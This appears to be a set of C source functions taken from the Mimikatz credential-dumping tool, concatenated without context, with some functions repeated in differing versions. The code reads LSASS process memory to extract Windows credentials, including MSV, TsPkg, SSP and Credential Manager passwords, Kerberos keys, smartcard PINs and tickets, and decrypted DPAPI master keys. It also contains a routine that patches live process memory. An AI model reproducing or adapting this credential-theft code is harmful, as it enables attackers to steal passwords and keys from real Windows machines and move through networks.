void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalName, PKULL_M_MEMORY_HANDLE hLSASS) { BOOL status = FALSE; KERB_EXTERNAL_NAME extName; PKERB_EXTERNAL_NAME pTempName; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &hBuffer};//, aLocalStrings = {NULL, &hBuffer}; DWORD i; if(aName.address) { *pExternalName = NULL; if(kull_m_memory_copy(&aLocalBuffer, &aName, sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING))) { i = sizeof(KERB_EXTERNAL_NAME) + (sizeof(UNICODE_STRING) * (extName.NameCount - 1)); if(pTempName = (PKERB_EXTERNAL_NAME) LocalAlloc(LPTR, i)) { *pExternalName = pTempName; aLocalBuffer.address = pTempName; if(status = kull_m_memory_copy(&aLocalBuffer, &aName, i)) for(i = 0; status && (i < pTempName->NameCount); i++) status = kull_m_string_getUnicodeString(&pTempName->Names[i], hLSASS); } } } }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData) { KIWI_TS_CREDENTIAL credentials; KIWI_TS_PRIMARY_CREDENTIAL primaryCredential; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem}; PVOID buffer = NULL; if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, sizeof(TsPkgReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &TSGlobalCredTable, NULL, NULL)) { aLsassMemory.address = TSGlobalCredTable; if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId)) { if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_CREDENTIAL))) { if(aLsassMemory.address = credentials.pTsPrimary) { aLocalMemory.address = &primaryCredential; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL))) kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData); } } } } else kprintf(L"KO"); }
BOOL kull_m_process_ntheaders(PKULL_M_MEMORY_ADDRESS pBase, PIMAGE_NT_HEADERS * pHeaders) { BOOL status = FALSE; IMAGE_DOS_HEADER headerImageDos; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBuffer = {&headerImageDos, &hBuffer}, aRealNtHeaders = {NULL, &hBuffer}, aProcess= {NULL, pBase->hMemory}; DWORD size; if(kull_m_memory_copy(&aBuffer, pBase, sizeof(IMAGE_DOS_HEADER)) && headerImageDos.e_magic == IMAGE_DOS_SIGNATURE) { aProcess.address = (PBYTE) pBase->address + headerImageDos.e_lfanew; if(aBuffer.address = LocalAlloc(LPTR, sizeof(DWORD) + IMAGE_SIZEOF_FILE_HEADER)) { if(kull_m_memory_copy(&aBuffer, &aProcess, sizeof(DWORD) + IMAGE_SIZEOF_FILE_HEADER) && ((PIMAGE_NT_HEADERS) aBuffer.address)->Signature == IMAGE_NT_SIGNATURE); { size = (((PIMAGE_NT_HEADERS) aBuffer.address)->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) ? sizeof(IMAGE_NT_HEADERS32) : sizeof(IMAGE_NT_HEADERS64); if(aRealNtHeaders.address = (PIMAGE_NT_HEADERS) LocalAlloc(LPTR, size)) { status = kull_m_memory_copy(&aRealNtHeaders, &aProcess, size); if(status) *pHeaders = (PIMAGE_NT_HEADERS) aRealNtHeaders.address; else LocalFree(aRealNtHeaders.address); } } LocalFree(aBuffer.address); } } return status; }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { KIWI_TS_CREDENTIAL credentials; KIWI_TS_PRIMARY_CREDENTIAL primaryCredential; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; PVOID buffer = NULL; if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, ARRAYSIZE(TsPkgReferences), (PVOID *) &TSGlobalCredTable, NULL, NULL)) { aLsassMemory.address = TSGlobalCredTable; if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), pData->LogonId)) { if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_CREDENTIAL))) { if(aLsassMemory.address = credentials.pTsPrimary) { aLocalMemory.address = &primaryCredential; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL))) kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN); } } } } else kprintf(L"KO"); }
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData) { KIWI_MSV1_0_CREDENTIALS credentials; KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem}; while(aLsassMemory.address) { aLocalMemory.address = &credentials; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS))) { aLsassMemory.address = credentials.PrimaryCredentials; while(aLsassMemory.address) { aLocalMemory.address = &primaryCredentials; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS))) { aLsassMemory.address = primaryCredentials.Credentials.Buffer; if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem)) { if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem)) { credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData); LocalFree(primaryCredentials.Primary.Buffer); } LocalFree(primaryCredentials.Credentials.Buffer); } } else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"); aLsassMemory.address = primaryCredentials.next; } aLsassMemory.address = credentials.next; } else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)"); } }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials; KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsass = {NULL, pData->cLsass->hLsassMem}; ULONG monNb = 0; if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, ARRAYSIZE(SspReferences), (PVOID *) &SspCredentialList, NULL, NULL, NULL)) { aLsass.address = SspCredentialList; if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY))) { aLsass.address = mesCredentials.Flink; while(aLsass.address != SspCredentialList) { if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY))) { if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer)) { kprintf(L"\n\t [%08x]", monNb++); kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN); } aLsass.address = mesCredentials.Flink; } else break; } } } else kprintf(L"KO"); }
PVOID kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(PKULL_M_MEMORY_ADDRESS pSecurityStruct, ULONG LUIDoffset, PLUID luidToFind) { PVOID resultat = NULL, pStruct; KULL_M_MEMORY_ADDRESS data = {&pStruct, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; if(aBuffer.address = LocalAlloc(LPTR, LUIDoffset + sizeof(LUID))) { if(kull_m_memory_copy(&data, pSecurityStruct, sizeof(PVOID))) { data.address = pStruct; data.hMemory = pSecurityStruct->hMemory; while(data.address != pSecurityStruct->address) { if(kull_m_memory_copy(&aBuffer, &data, LUIDoffset + sizeof(LUID))) { if(SecEqualLuid(luidToFind, (PLUID) ((PBYTE)(aBuffer.address) + LUIDoffset))) { resultat = data.address; break; } data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink; } else break; } } LocalFree(aBuffer.address); } return resultat; }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData) { KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, cLsass->hLsassMem}; ULONG monNb = 0; if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, sizeof(SspReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &SspCredentialList, NULL, NULL)) { aLsass.address = SspCredentialList; if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY))) { aLsass.address = mesCredentials.Flink; while(aLsass.address != SspCredentialList) { if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY))) { if(RtlEqualLuid(logId, &mesCredentials.LogonId)) { kprintf(L"\n\t [%08x]", monNb++); kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData); } aLsass.address = mesCredentials.Flink; } else break; } } } else kprintf(L"KO"); }
PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULONG LUIDoffset, PLUID luidToFind) { PVOID resultat = NULL; RTL_AVL_TABLE maTable; KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE))) { if(pTable->address = maTable.OrderedPointer) { if(data.address = LocalAlloc(LPTR, LUIDoffset + sizeof(LUID))) { if(kull_m_memory_copy(&data, pTable, LUIDoffset + sizeof(LUID))) { if(SecEqualLuid(luidToFind, (PLUID) ((PBYTE) (data.address) + LUIDoffset))) resultat = maTable.OrderedPointer; } LocalFree(data.address); } } if(!resultat && (pTable->address = maTable.BalancedRoot.LeftChild)) resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind); if(!resultat && (pTable->address = maTable.BalancedRoot.RightChild)) resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind); } return resultat; }
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData) { DWORD i, nbHash; KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}; if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList)) { kuhl_m_sekurlsa_printinfos_logonData(pData); kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL); kprintf(L"\n\t * Key List :\n"); if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize)) { if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize)) { if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1]) { RemoteLocalKerbSession.address = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize; i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize; if(aLocalHashMemory.address = LocalAlloc(LPTR, i)) { if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i)) for(i = 0; i < nbHash; i++) kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10))); LocalFree(aLocalHashMemory.address); } } } LocalFree(aLocalKeyMemory.address); } } }
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData) { KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0}; PBYTE infosCsp; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem}; kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10); if(aLsassMemory.address) { if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize)) { aLocalMemory.address = infosCsp; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structCspInfosSize)) { creds.UserName = *(PUNICODE_STRING) infosCsp; if(kerbHelper[KerbOffsetIndex].offsetNames && kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct) { creds.Domaine.Length = (USHORT) (*(PDWORD) (infosCsp + kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct) - (kerbHelper[KerbOffsetIndex].offsetNames - kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct)); if(creds.Domaine.Buffer = (PWSTR) LocalAlloc(LPTR, creds.Domaine.Length)) { aLsassMemory.address = (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetNames; aLocalMemory.address = creds.Domaine.Buffer; kull_m_memory_copy(&aLocalMemory, &aLsassMemory, creds.Domaine.Length); } } kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0)); if(creds.Domaine.Buffer) LocalFree(creds.Domaine.Buffer); } LocalFree(infosCsp); } } }
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile) { PVOID pStruct, pRef = tickets; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem}; DWORD nbTickets = 0; PKIWI_KERBEROS_TICKET pKiwiTicket; PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; BOOL isNormalSessionKey; wchar_t * filename; if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize)) { if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID))) { data.address = pStruct; data.hMemory = pData->cLsass->hLsassMem; while(data.address != pRef) { if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize)) { kprintf(L"\n\t [%08x]", nbTickets); if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem)) { isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data)); kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE); if(isFile) if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT)) { if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE)) { if(kull_m_file_writeData(filename, App_KrbCred, kull_m_asn1_getSize(App_KrbCred))) kprintf(L"\n\t * Saved to file %s !", filename); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); LocalFree(App_KrbCred); } LocalFree(filename); } if(!isNormalSessionKey) { kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType)); kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value); } kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket); } data.address = ((PLIST_ENTRY) (aTicket.address))->Flink; } else break; nbTickets++; } } LocalFree(aTicket.address); } }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { KIWI_CREDMAN_SET_LIST_ENTRY setList; KIWI_CREDMAN_LIST_STARTER listStarter; DWORD nbCred = 0; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &hLocalMemory}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem}; PVOID pRef; KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds; ULONG CredOffsetIndex; if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) CredOffsetIndex = 0; else if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_7) CredOffsetIndex = 1; else CredOffsetIndex = 2; if(aLsassMemory.address) { if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY))) { aLocalMemory.address = &listStarter; if(aLsassMemory.address = setList.list1) { pRef = (PBYTE) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start); if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_LIST_STARTER))) { if(aLocalMemory.address = LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize)) { if(aLsassMemory.address = listStarter.start) { while(aLsassMemory.address != pRef) { aLsassMemory.address = (PBYTE) aLsassMemory.address - credhelper[CredOffsetIndex].offsetFLink; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, credhelper[CredOffsetIndex].structSize)) { kprintf(L"\n\t [%08x]", nbCred); kiwiCreds.UserName = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetUsername); kiwiCreds.Domaine = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetDomain); kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetCbPassword);; kiwiCreds.Password.Buffer = *(PWSTR *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetPassword); kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS); aLsassMemory.address = *(PVOID *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetFLink); } else break; nbCred++; } } LocalFree(aLocalMemory.address); } } } } } }
PBYTE kuhl_m_misc_detours_testHookDestination(PKULL_M_MEMORY_ADDRESS base, WORD machineOfProcess, DWORD level) { PBYTE dst = NULL; BYTE bufferJmp[] = {0xe9}, bufferJmpOff[] = {0xff, 0x25}, bufferRetSS[] = {0x50, 0x48, 0xb8}; KUHL_M_MISC_DETOURS_HOOKS myHooks[] = { {0, bufferJmp, sizeof(bufferJmp), sizeof(bufferJmp), sizeof(LONG), TRUE, FALSE}, {1, bufferJmpOff, sizeof(bufferJmpOff), sizeof(bufferJmpOff), sizeof(LONG), !(machineOfProcess == IMAGE_FILE_MACHINE_I386), TRUE}, {0, bufferRetSS, sizeof(bufferRetSS), sizeof(bufferRetSS), sizeof(PVOID), FALSE, FALSE}, }; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer}, dBuffer = {&dst, &hBuffer}; KULL_M_MEMORY_ADDRESS pBuffer = *base; DWORD i, sizeToRead; for(i = 0; !dst && (i < sizeof(myHooks) / sizeof(KUHL_M_MISC_DETOURS_HOOKS)); i++) { if(level >= myHooks[i].minLevel) { sizeToRead = myHooks[i].offsetToRead + myHooks[i].szToRead; if(aBuffer.address = LocalAlloc(LPTR, sizeToRead)) { if(kull_m_memory_copy(&aBuffer, base, sizeToRead)) { if(RtlEqualMemory(myHooks[i].pattern, aBuffer.address, myHooks[i].szPattern)) { if(myHooks[i].isRelative) { dst = (PBYTE) pBuffer.address + sizeToRead + *(PLONG) ((PBYTE) aBuffer.address + myHooks[i].offsetToRead); } else { dst = *(PBYTE *) ((PBYTE) aBuffer.address + myHooks[i].offsetToRead); #ifdef _M_X64 if(machineOfProcess == IMAGE_FILE_MACHINE_I386) dst = (PBYTE) ((ULONG_PTR) dst & 0xffffffff); #endif } if(myHooks[i].isTarget) { pBuffer.address = dst; kull_m_memory_copy(&dBuffer, &pBuffer, sizeof(PBYTE)); #ifdef _M_X64 if(machineOfProcess == IMAGE_FILE_MACHINE_I386) dst = (PBYTE) ((ULONG_PTR) dst & 0xffffffff); #endif } } } LocalFree(aBuffer.address); } } } return dst; }
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData) { KIWI_MASTERKEY_CACHE_ENTRY mesCredentials; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem}; PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package; BYTE dgst[SHA_DIGEST_LENGTH]; DWORD monNb = 0; if(pData->LogonType != Network) { kuhl_m_sekurlsa_printinfos_logonData(pData); if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, ARRAYSIZE(MasterKeyCacheReferences), (PVOID *) &pMasterKeyCacheList, NULL, NULL, NULL)) { aLsass.address = pMasterKeyCacheList; if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY))) { aLsass.address = mesCredentials.Flink; while(aLsass.address != pMasterKeyCacheList) { if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY))) { if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId)) { kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++); kull_m_string_displayGUID(&mesCredentials.KeyUid); kprintf(L"\n\t * Time :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime); if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize)) { aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key); if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize)) { (*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize); kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0); if(kull_m_crypto_hash(CALG_SHA1, aKey.address, mesCredentials.keySize, dgst, SHA_DIGEST_LENGTH)) { kprintf(L"\n\t * sha1(key) :\t"); kull_m_string_wprintf_hex(dgst, SHA_DIGEST_LENGTH, 0); kuhl_m_dpapi_oe_masterkey_add(&mesCredentials.KeyUid, dgst, SHA_DIGEST_LENGTH); } } LocalFree(aKey.address); } kprintf(L"\n"); } aLsass.address = mesCredentials.Flink; } else break; } } } else kprintf(L"\n\tKO"); kprintf(L"\n"); } return TRUE; }
BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack) { BOOL result = FALSE, resultBackup = !pCallBackBeforeRestore, resultProtect = TRUE; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS destination = {NULL, sMemory->kull_m_memoryRange.kull_m_memoryAdress.hMemory}; KULL_M_MEMORY_ADDRESS backup = {NULL, &hLocalMemory}; MEMORY_BASIC_INFORMATION readInfos; NTSTATUS status; DWORD flags, oldProtect = 0, tempProtect = 0; if(kull_m_memory_search(pPattern, szPattern, sMemory, TRUE)) { destination.address = (LPBYTE) sMemory->result + offsetOfPatch; if(!resultBackup) if(backup.address = LocalAlloc(LPTR, szPatch)) resultBackup = kull_m_memory_copy(&backup, &destination, szPatch); if(resultBackup) { if(kull_m_memory_query(&destination, &readInfos)) { flags = readInfos.Protect & ~0xff; if((readInfos.Protect & 0x0f) && ((readInfos.Protect & 0x0f) < PAGE_READWRITE)) tempProtect = PAGE_READWRITE; else if((readInfos.Protect & 0xf0) && ((readInfos.Protect & 0xf0) < PAGE_EXECUTE_READWRITE)) tempProtect = PAGE_EXECUTE_READWRITE; if(tempProtect) resultProtect = kull_m_memory_protect(&destination, szPatch, tempProtect | flags, &oldProtect); if(resultProtect) { if(result = kull_m_memory_copy(&destination, pPatch, szPatch)) { if(pCallBackBeforeRestore) { status = pCallBackBeforeRestore(argc, args); if(pRetCallBack) *pRetCallBack = status; result = kull_m_memory_copy(&destination, &backup, szPatch); } } if(oldProtect) kull_m_memory_protect(&destination, szPatch, oldProtect, NULL); } } if(backup.address) LocalFree(backup.address); } } return result; }
